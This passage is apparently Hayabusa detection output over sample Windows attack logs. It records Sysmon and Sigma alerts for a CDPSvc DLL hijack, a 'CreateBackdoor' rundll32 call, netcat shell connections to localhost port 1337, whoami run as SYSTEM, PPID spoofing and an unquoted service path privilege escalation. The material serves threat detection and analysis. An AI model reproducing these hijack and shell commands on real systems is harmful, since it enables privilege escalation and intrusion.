| Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:40.502 
+09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | 
PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 
dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:07.872 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:38.828 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: 
C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 747F3D96-0880-5E76-0000-001014202B00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-22 06:45:04.908 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:04.923 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,../hayabusa-rules/sigma/file_event/win_fe_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:18:47.143 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: 
C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,info,,Process 
Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 808 | PGUID: 747F3D96-B764-5EA4-0000-0010FE6F0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
